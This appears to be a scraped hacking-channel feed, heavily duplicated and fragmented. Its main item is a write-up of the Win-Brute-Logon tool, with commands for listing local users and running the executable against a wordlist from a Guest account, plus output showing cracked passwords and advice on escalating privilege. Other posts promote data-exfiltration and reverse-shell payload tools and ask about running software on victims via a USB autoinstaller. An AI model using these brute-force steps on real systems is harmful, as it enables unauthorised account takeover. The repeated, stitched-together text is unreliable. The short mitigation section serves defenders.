Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Win-Brute-Logon : Crack Any Microsoft Windows Users Password Without Any Privilege
Win-Brute-Logon PoC is more what I would call a serious weakness in Microsoft Windows Authentication mechanism than a vulnerability.
The biggest issue is related to the lack of privilege required to perform such actions.
Indeed, from a Guest account (The most limited account on Microsoft Windows), you can crack the password of any available local users.
Find out which users exists using command :
Install and configure a freshly updated Windows 10 virtual or physical machine.
In my case full Windows version was :
/!\ Important notice: I used the Guest account for the demo but this PoC is not only limited to Guest account, it will work from any account / group (guest user / regular user / admin user etc…) Create a new admin user
Place the PoC executable anywhere you have access as Guest user.
Usage :
By default, domain name is the value designated by
Wait few seconds to see the following result:
[ .. ] Load 10k-most-common.txt file in memory…
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads…
[INFO] New “TWorker” Thread created with id=2260, handle=364
[INFO] New “TWorker” Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads…
[INFO] “TWorkers”(id=2260, handle=364) Thread successfully terminated.
[INFO] “TWorkers”(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06 Crack Second User :
Wait few seconds to see the following result:
[ .. ] Load 10k-most-common.txt file in memory…
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads…
[INFO] New “TWorker” Thread created with id=5748, handle=336
[INFO] New “TWorker” Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads…
[INFO] “TWorkers”(id=5748, handl[...]
___________________________
@hacking_Attack
@Hacking_Video
Win-Brute-Logon : Crack Any Microsoft Windows Users Password Without Any Privilege
Win-Brute-Logon PoC is more what I would call a serious weakness in Microsoft Windows Authentication mechanism than a vulnerability.
The biggest issue is related to the lack of privilege required to perform such actions.
Indeed, from a Guest account (The most limited account on Microsoft Windows), you can crack the password of any available local users.
Find out which users exists using command :
net userThis PoC is using multithreading to speed up the process and support both 32 and 64bit. UsageWordlist FileWinBruteLogon.exe -u Stdin Wordlisttype PoC Test Scenario (With a Guest Account)Tested on Windows 10Install and configure a freshly updated Windows 10 virtual or physical machine.
In my case full Windows version was :
1909 (OS Build 18363.778)Log as administrator and lets create two different accounts : one administrator and one regular user. Both users are local./!\ Important notice: I used the Guest account for the demo but this PoC is not only limited to Guest account, it will work from any account / group (guest user / regular user / admin user etc…) Create a new admin user
net user darkcodersc /addnet user darkcodersc trousers(trousers is the password) net localgroup administrators darkcodersc /addCreate a regular usernet user HackMe /addnet user HackMe ozlq6qwm(ozlq6qwm is the password) Create a new Guest accountnet user GuestUser /addnet localgroup users GuestUser /deletenet localgroup guests GuestUser /addGet a WordlistIn my case both trousersand ozlq6qwmare in SecList : https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt Start the attackLogoff from administrator account or restart your machine and log to the Guest account.Place the PoC executable anywhere you have access as Guest user.
Usage :
WinBruteLogon.exe -v -u -vis optional, it design the verbose mode.By default, domain name is the value designated by
%USERDOMAIN%env var. You can specify a custom name with option -dCrack First User : darkcodersc(Administrator)prompt(guest)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txtWait few seconds to see the following result:
[ .. ] Load 10k-most-common.txt file in memory…
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads…
[INFO] New “TWorker” Thread created with id=2260, handle=364
[INFO] New “TWorker” Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads…
[INFO] “TWorkers”(id=2260, handle=364) Thread successfully terminated.
[INFO] “TWorkers”(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06 Crack Second User :
HackMe(Regular User)prompt(guest)>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txtWait few seconds to see the following result:
[ .. ] Load 10k-most-common.txt file in memory…
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads…
[INFO] New “TWorker” Thread created with id=5748, handle=336
[INFO] New “TWorker” Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads…
[INFO] “TWorkers”(id=5748, handl[...]
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Win-Brute-Logon : Crack Any Microsoft Windows Users Password
Win-Brute-Logon PoC is more what I would call a serious weakness in Microsoft Windows Authentication mechanism than a vulnerability.
Hacking Articles Tips Tricks Videos Tutorials
Kali Linux Tutorials Win-Brute-Logon : Crack Any Microsoft Windows Users Password Without Any Privilege Win-Brute-Logon PoC is more what I would call a serious weakness in Microsoft Windows Authentication mechanism than a vulnerability. The biggest issue…
e=336) Thread successfully terminated.
[INFO] “TWorkers”(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06 Real world scenarioIf you gain access to a low privileged user, you could crack the password of a more privileged user and escalate your privilege. Mitigation (General)* Disable guest(s) account(s) if present.
* Application white-listing.
* Follow the guidelines to create and keep a password strong. Apply this to all users. Implement Security Lockout Policy (Not present by default)Open
Value represent the number of possible attempt before getting locked.
/!\ LockDown Policy wont work on Administrator account. At this moment, best protection for Administrator account (if Enabled) is to setup a very complex password. Download
___________________________
@hacking_Attack
@Hacking_Video
[INFO] “TWorkers”(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06 Real world scenarioIf you gain access to a low privileged user, you could crack the password of a more privileged user and escalate your privilege. Mitigation (General)* Disable guest(s) account(s) if present.
* Application white-listing.
* Follow the guidelines to create and keep a password strong. Apply this to all users. Implement Security Lockout Policy (Not present by default)Open
secpol.mscthen go to Account Policies> Account Lockout Policyand edit value Account lockout thresholdwith desired value from (1 to 999).Value represent the number of possible attempt before getting locked.
/!\ LockDown Policy wont work on Administrator account. At this moment, best protection for Administrator account (if Enabled) is to setup a very complex password. Download
___________________________
@hacking_Attack
@Hacking_Video
[OC] Data Exfiltration using RedDrop - A Python Webserver for file and data exfiltration which automatically detects, decodes, decrypts, and transforms data.
https://www.reddit.com/r/redteamsec/comments/tra34k/oc_data_exfiltration_using_reddrop_a_python/
submitted by /u/cyberbutler (https://www.reddit.com/user/cyberbutler)
[link] (https://medium.com/maverislabs/data-exfiltration-using-reddrop-13bcbad7acb0?source=friends_link&sk=34320be3746773a82d065d03ea05111b) [comments] (https://www.reddit.com/r/redteamsec/comments/tra34k/oc_data_exfiltration_using_reddrop_a_python/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/tra34k/oc_data_exfiltration_using_reddrop_a_python/
submitted by /u/cyberbutler (https://www.reddit.com/user/cyberbutler)
[link] (https://medium.com/maverislabs/data-exfiltration-using-reddrop-13bcbad7acb0?source=friends_link&sk=34320be3746773a82d065d03ea05111b) [comments] (https://www.reddit.com/r/redteamsec/comments/tra34k/oc_data_exfiltration_using_reddrop_a_python/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
[OC] Data Exfiltration using RedDrop - A Python Webserver for file...
Posted in r/redteamsec by u/cyberbutler • 3 points and 1 comment
Hacking on Medium
Prototype Pollution Client Side
A vulnerabilidade prototype pollution no client-side ocorre quando o invasor por meio de uma query consiga manipular o prototype assim…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Prototype Pollution Client Side
A vulnerabilidade prototype pollution no client-side ocorre quando o invasor por meio de uma query consiga manipular o prototype assim…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Prototype Pollution Client Side
A vulnerabilidade prototype pollution no client-side ocorre quando o invasor por meio de uma query consiga manipular o prototype assim…
Hacking on Medium
nothing
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
nothing
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
nothing
nothing
Hacking on Medium
Ellipsis.Finance Hack and Rescue Mission
https://cdn-images-1.medium.com/max/1920/1*GALtnsG_hgboAEcX6wIcOw.jpeg
Last December a rather large and time-sensitive rescue request was made in the flashbots token rescue team hotline. The victim had a large
Continue reading on bloXroute Labs »
___________________________
@hacking_Attack
@Hacking_Video
Ellipsis.Finance Hack and Rescue Mission
https://cdn-images-1.medium.com/max/1920/1*GALtnsG_hgboAEcX6wIcOw.jpeg
Last December a rather large and time-sensitive rescue request was made in the flashbots token rescue team hotline. The victim had a large
Continue reading on bloXroute Labs »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Ellipsis.Finance Rescue
Last December a rather large and time-sensitive rescue request was made in the flashbots token rescue team hotline. The victim had a large
Hacking on Medium
WolvSec CTF — March, 2022
https://cdn-images-1.medium.com/max/600/1*351R1e4k1LJo0ZJvwSBuZw.png
“Warm Up: Burp” challenge write-up
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
WolvSec CTF — March, 2022
https://cdn-images-1.medium.com/max/600/1*351R1e4k1LJo0ZJvwSBuZw.png
“Warm Up: Burp” challenge write-up
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
WolvSec CTF — March, 2022
“Warm Up: Burp” challenge write-up
Hacking on Medium
All of Contenda’s traditions… Ranked
https://cdn-images-1.medium.com/max/2600/1*eTZjS9kOO-Eoc9m6qeb56Q.jpeg
We’re a pretty meme-y group of people, so we have a lot of weird traditions. Here they all are, ranked.
Continue reading on Contenda »
___________________________
@hacking_Attack
@Hacking_Video
All of Contenda’s traditions… Ranked
https://cdn-images-1.medium.com/max/2600/1*eTZjS9kOO-Eoc9m6qeb56Q.jpeg
We’re a pretty meme-y group of people, so we have a lot of weird traditions. Here they all are, ranked.
Continue reading on Contenda »
___________________________
@hacking_Attack
@Hacking_Video
Medium
All of Contenda’s traditions… Ranked
We’re a pretty meme-y group of people, so we have a lot of weird traditions. Here they all are, ranked.
Hacking on Medium
THM’s Alfred — Walkthrough
https://cdn-images-1.medium.com/max/1193/1*Z_0OHsqAKIOOSmIujRSb-g.png
Initial Access
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
THM’s Alfred — Walkthrough
https://cdn-images-1.medium.com/max/1193/1*Z_0OHsqAKIOOSmIujRSb-g.png
Initial Access
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
THM’s Alfred — Walkthrough
Initial Access
hacking: security in practice
Lapsus Ransomware Gang Ups the Ante with Impresa and NVIDIA Attacks
The Lapsus ransomware gang has arrived on the scene and has already claimed several high-profile targets, with victims including Impresa – the largest media conglomerate in Portugal, Brazil’s Ministry of Health (MoH), the Brazilian telecommunications operator Claro, and most recently, the Santa Clara, CA-based GPU vendor NVIDIA.
The Lapsus ransomware gang – also referred to as Lapsus$ – is a relatively new threat actor and is making a reputation for itself in an already crowded ransomware market. Most ransomware gangs now practice double extortion, where prior to encrypting files they exfiltrate sensitive data and threaten to publish the data if the ransom is not paid. Triple extortion tactics are now becoming common, where threats are also issued to notify shareholders, partners, and customers about attacks. The Lapsus gang has taken things a step further still and is boasting about its attacks and causing major embarrassment for victims.
spamtitan.com/blog/lapsus-ransomware/
submitted by /u/AdvertisingMajor6010
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Lapsus Ransomware Gang Ups the Ante with Impresa and NVIDIA Attacks
The Lapsus ransomware gang has arrived on the scene and has already claimed several high-profile targets, with victims including Impresa – the largest media conglomerate in Portugal, Brazil’s Ministry of Health (MoH), the Brazilian telecommunications operator Claro, and most recently, the Santa Clara, CA-based GPU vendor NVIDIA.
The Lapsus ransomware gang – also referred to as Lapsus$ – is a relatively new threat actor and is making a reputation for itself in an already crowded ransomware market. Most ransomware gangs now practice double extortion, where prior to encrypting files they exfiltrate sensitive data and threaten to publish the data if the ransom is not paid. Triple extortion tactics are now becoming common, where threats are also issued to notify shareholders, partners, and customers about attacks. The Lapsus gang has taken things a step further still and is boasting about its attacks and causing major embarrassment for victims.
spamtitan.com/blog/lapsus-ransomware/
submitted by /u/AdvertisingMajor6010
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Lapsus Ransomware Gang Ups the Ante with Impresa and NVIDIA Attacks
The Lapsus ransomware gang has arrived on the scene and has already claimed several high-profile targets, with victims including Impresa – the...
Razer synapse autoinstaller
https://www.reddit.com/r/Pentesting/comments/trfwv5/razer_synapse_autoinstaller/
I recently purchased a wireless razer headset. When I plugged in the USB it came with it opened Razer Synapse Installer without a prompt whatsoever. Could this be used for executing custom software on victim computers? submitted by /u/JMLindeN (https://www.reddit.com/user/JMLindeN)
[link] (https://www.reddit.com/r/Pentesting/comments/trfwv5/razer_synapse_autoinstaller/) [comments] (https://www.reddit.com/r/Pentesting/comments/trfwv5/razer_synapse_autoinstaller/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/trfwv5/razer_synapse_autoinstaller/
I recently purchased a wireless razer headset. When I plugged in the USB it came with it opened Razer Synapse Installer without a prompt whatsoever. Could this be used for executing custom software on victim computers? submitted by /u/JMLindeN (https://www.reddit.com/user/JMLindeN)
[link] (https://www.reddit.com/r/Pentesting/comments/trfwv5/razer_synapse_autoinstaller/) [comments] (https://www.reddit.com/r/Pentesting/comments/trfwv5/razer_synapse_autoinstaller/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Razer synapse autoinstaller
I recently purchased a wireless razer headset. When I plugged in the USB it came with it opened Razer Synapse Installer without a prompt...
HTTP Header Injection
https://medium.com/codex/http-header-injection-4ba857fb9a16?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/codex/http-header-injection-4ba857fb9a16?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
HTTP Header Injection
What is HTTP Header Injection?
What is HTTP Header Injection?Continue reading on CodeX » (https://medium.com/codex/http-header-injection-4ba857fb9a16?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
HTTP Header Injection
What is HTTP Header Injection?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
CriticalStart Releases Enhanced Capabilities for Microsoft 365 Defender
Latest enhancements allow customers to leverage Microsoft 365 Defender and MDR to respond to breaches stemming from user account-based attacks.
___________________________
@hacking_Attack
@Hacking_Video
CriticalStart Releases Enhanced Capabilities for Microsoft 365 Defender
Latest enhancements allow customers to leverage Microsoft 365 Defender and MDR to respond to breaches stemming from user account-based attacks.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
CriticalStart Releases Enhanced Capabilities for Microsoft 365 Defender
Latest enhancements allow customers to leverage Microsoft 365 Defender and MDR to respond to breaches stemming from user account-based attacks.
Swappi Testnet publica y recompensas por errores
Prueba Swappi y gana recompensas. ¡Hasta 100.000 $PPI de recompensa!Continue reading on Conflux en español »
Read more...
Prueba Swappi y gana recompensas. ¡Hasta 100.000 $PPI de recompensa!Continue reading on Conflux en español »
Read more...
LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly
http://www.kitploit.com/2022/03/lazypariah-tool-for-generating-reverse.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2022/03/lazypariah-tool-for-generating-reverse.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly